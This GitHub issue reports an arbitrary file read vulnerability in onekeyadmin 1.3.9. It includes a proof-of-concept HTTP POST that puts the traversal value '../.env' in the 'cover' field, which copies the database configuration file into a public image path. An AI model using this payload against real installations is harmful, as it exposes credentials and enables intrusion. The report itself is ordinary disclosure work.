Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Background development assistant arbitrary file reading vulnerability #4

Open
qbz95aaa opened this issue Jan 10, 2023 · 1 comment
Open

Comments

@qbz95aaa
Copy link

qbz95aaa commented Jan 10, 2023

Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file reading
Vulnerability Details:
Vulnerability location
app\admin\controller\Curd#code Here the file_get_contents function is called without any filtering
image

So we can write the file we want to read into menu.png to cause any file to be read

Vulnerability recurrence
Here we read the database configuration file .env in the root directory

poc
`POST /admin1/curd/code HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 59
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/curd/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"name":"test","title":"test","cover":"../.env","table":[]}`
image

You can see that the file was successfully written to our menu.png, causing any file to be read
http://192.168.3.129:8091/plugins/test/menu.png
image

@qbz95aaa
Copy link
Author

find by Chaitin Security Research Lab

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant